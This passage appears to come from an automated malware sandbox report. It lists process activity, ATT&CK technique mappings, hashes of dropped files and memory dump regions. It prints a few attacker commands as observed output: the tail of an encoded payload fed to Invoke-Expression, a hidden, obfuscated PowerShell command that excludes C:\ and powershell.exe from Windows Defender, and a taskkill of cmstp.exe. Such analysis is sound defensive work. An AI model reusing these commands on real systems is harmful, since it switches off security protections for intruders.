c3RyaW5nW11dICgnJUFCQycpKTs=')) | Invoke-Expression"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4564

C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4212

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4a94b4432dca934df6651a53f56abe6b

SHA1
1461c5bc22eaef55ed98713d67a4c5f5c8e11d69

SHA256
63455ddf3d736ca85a5a6805851142c18f28b9987d5f6caa9dd490269b34f8a2

SHA512
8f262e5b722138e3b1576e89528a46c031a0239939d45916e0a688ca802c6de3d3ddf19391a6b5660ac7fb9dc9da25eb9c2ad8fd77ed798175a09e2095cb94b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9635.tmp

Filesize
1KB

MD5
f11fe3657a4a404e5b1b59e4956eb26f

SHA1
58bff9c85eda1c987ff1a56afb967abc74cd1ac0

SHA256
a2b73bc78aecd49d8af8acf5423fcf956699295c05d359475ea60d373ee02f89

SHA512
7f75d3ea4671765db036234713336b1bc02a224e0d6adde74d0237b166afa76cf54892edc8bf7349134e51932074baabbcbec9b381d26ca903e83feb313be7c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rv1haui3.2k5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\c.bat

Filesize
269KB

MD5
245dd461fa69b6c1d8abbf653b318cff

SHA1
90c2ac95dbb0eb62c94b835dd38cc81af9ff1e70

SHA256
6d582333e7c644edbc40e5856c267f5d321c33d705940a7e3450795fa1bebc3d

SHA512
aba92cb3c4804d86c1d3ce457603918cf961e23c76d9de1af3eb5d80fb3b5903e56bfb8da007848a5d341d7100a1404ae472db3ebd1529be51a5f63c7d4e40f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\xnflfy0t\xnflfy0t.dll

Filesize
4KB

MD5
37d8119413cfecb307de976d233cad33

SHA1
e2ede6220cf292b5b0a961c55967849960ade1eb

SHA256
0973217e59d2cfd975c09cb6c840cc06004fbb13cdfde441051f29e567163cb6

SHA512
ec5974362a1c2eba1a24a7007fb2541420ccc8632983d0661fead116dcd6c31ff0dcfdf9e158f2d33f62c8e70ce6bdf05199e58f906bf666968a9a9323b4ebc6

Download Submit
C:\windows\temp\vwalkctu.inf

Filesize
663B

MD5
27581dbbe3c3840ce72f99c21071898a

SHA1
898afeb9523df9367c74a01c0dbecf6b637f3cb1

SHA256
c5f2bbdebccd52c3eba3c97a251ffa2ccd01f64de764e560f804045fe868d27b

SHA512
0b9c4531e8be5b292638cb2cad7fd1b72ed3f1aa20ea027b9a013a8bfb2daaa4a25a40c37423e0924d110bbbbfad4a6e21aa03f4694978d205d7ac9739567d9f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xnflfy0t\CSCDFED3A772E394210AA58B5AA5AB2C29A.TMP

Filesize
652B

MD5
e8ed12815c6f86e36eeaac3272ac02b7

SHA1
f7813a3e94e5f75d402659b092618da7a3c62014

SHA256
9619b1067a70bf00efa11b41204bdf1e22ef8a186cdbbfef2c21e53ae7f69765

SHA512
d8a361fc0205f28e01a57aef6f4d51c6314c3544a645a572c7bdc618ba00072a75272a5c90dacc4160da33bbdcf008fabade84d2c4cace50857421db2392c57a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xnflfy0t\xnflfy0t.0.cs

Filesize
2KB

MD5
b8106096972fb511e0cf8b99386ecf93

SHA1
3003ba3a3681ba16d124d5b2305e6cc59af79b44

SHA256
49d2a0f78cbec3d87396b6f52f791c66505edeec87a70d4ce45721288210da02

SHA512
218bd9cd17c56d2e138205a197780cc2a5a81bfce7d5439eecb168f61955ba97793e7333425c064f6b6337e1f70c75bd373a7fb502a8c538fb046600018f871e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xnflfy0t\xnflfy0t.cmdline

Filesize
369B

MD5
0628ba4c356d125e1a3ff5e39528d291

SHA1
6f0f0c12db075b0be0ce540ecd5bf3918362710d

SHA256
aabafb9471e37f9946ad646964e1fa3509f9ab49ab235345d7eb663253729dcf

SHA512
0166f54ebb6fcc49fb6e3e41ddc5e2560c308775319934f6253678d73b9700703809ec45ad8a1164e7d2edbe60256d12fb1689ca66fd2a697ca6b4bd56d52c0f

Download Submit
memory/464-90-0x0000000007FF0000-0x0000000007FFE000-memory.dmp

Filesize
56KB

Download
memory/464-73-0x0000000007E40000-0x0000000007E72000-memory.dmp

Filesize
200KB

Download
memory/464-105-0x0000000005650000-0x000000000565A000-memory.dmp

Filesize
40KB

Download
memory/464-103-0x0000000008A80000-0x0000000008ABC000-memory.dmp

Filesize
240KB

Download
memory/464-102-0x0000000008A20000-0x0000000008A32000-memory.dmp

Filesize
72KB

Download
memory/464-101-0x0000000008900000-0x0000000008992000-memory.dmp

Filesize
584KB

Download
memory/464-100-0x0000000008800000-0x000000000885E000-memory.dmp

Filesize
376KB

Download
memory/464-97-0x0000000008DB0000-0x0000000009354000-memory.dmp

Filesize
5.6MB

Download
memory/464-96-0x0000000007DD0000-0x0000000007E04000-memory.dmp

Filesize
208KB

Download
memory/464-53-0x0000000005340000-0x0000000005376000-memory.dmp

Filesize
216KB

Download
memory/464-54-0x00000000059B0000-0x0000000005FD8000-memory.dmp

Filesize
6.2MB

Download
memory/464-55-0x0000000005940000-0x0000000005962000-memory.dmp

Filesize
136KB

Download
memory/464-56-0x0000000006050000-0x00000000060B6000-memory.dmp

Filesize
408KB

Download
memory/464-57-0x00000000061B0000-0x0000000006216000-memory.dmp

Filesize
408KB

Download
memory/464-67-0x0000000006220000-0x0000000006574000-memory.dmp

Filesize
3.3MB

Download
memory/464-69-0x0000000006700000-0x000000000671E000-memory.dmp

Filesize
120KB

Download
memory/464-70-0x0000000006740000-0x000000000678C000-memory.dmp

Filesize
304KB

Download
memory/464-71-0x0000000008040000-0x00000000086BA000-memory.dmp

Filesize
6.5MB

Download
memory/464-72-0x0000000006C30000-0x0000000006C4A000-memory.dmp

Filesize
104KB

Download
memory/464-95-0x0000000005680000-0x0000000005688000-memory.dmp

Filesize
32KB

Download
memory/464-74-0x00000000703A0000-0x00000000703EC000-memory.dmp

Filesize
304KB

Download
memory/464-75-0x0000000070540000-0x0000000070894000-memory.dmp

Filesize
3.3MB

Download
memory/464-85-0x0000000007E80000-0x0000000007E9E000-memory.dmp

Filesize
120KB

Download
memory/464-86-0x0000000007EB0000-0x0000000007F53000-memory.dmp

Filesize
652KB

Download
memory/464-87-0x0000000007FB0000-0x0000000007FBA000-memory.dmp

Filesize
40KB

Download
memory/464-88-0x0000000008760000-0x00000000087F6000-memory.dmp

Filesize
600KB

Download
memory/464-89-0x0000000007FC0000-0x0000000007FD1000-memory.dmp

Filesize
68KB

Download
memory/464-93-0x00000000086C0000-0x00000000086C8000-memory.dmp

Filesize
32KB

Download
memory/464-91-0x0000000008010000-0x0000000008024000-memory.dmp

Filesize
80KB

Download
memory/464-92-0x00000000086E0000-0x00000000086FA000-memory.dmp

Filesize
104KB

Download
memory/1532-4-0x00007FFA23553000-0x00007FFA23555000-memory.dmp

Filesize
8KB

Download
memory/1532-17-0x000002217B490000-0x000002217B4AC000-memory.dmp

Filesize
112KB

Download
memory/1532-50-0x00007FFA23550000-0x00007FFA24011000-memory.dmp

Filesize
10.8MB

Download
memory/1532-12-0x000002217B430000-0x000002217B452000-memory.dmp

Filesize
136KB

Download
memory/1532-47-0x00007FFA23553000-0x00007FFA23555000-memory.dmp

Filesize
8KB

Download
memory/1532-46-0x00007FFA23550000-0x00007FFA24011000-memory.dmp

Filesize
10.8MB

Download
memory/1532-15-0x00007FFA23550000-0x00007FFA24011000-memory.dmp

Filesize
10.8MB

Download
memory/1532-30-0x000002217D9C0000-0x000002217D9C8000-memory.dmp

Filesize
32KB

Download
memory/1532-16-0x00007FFA23550000-0x00007FFA24011000-memory.dmp

Filesize
10.8MB

Download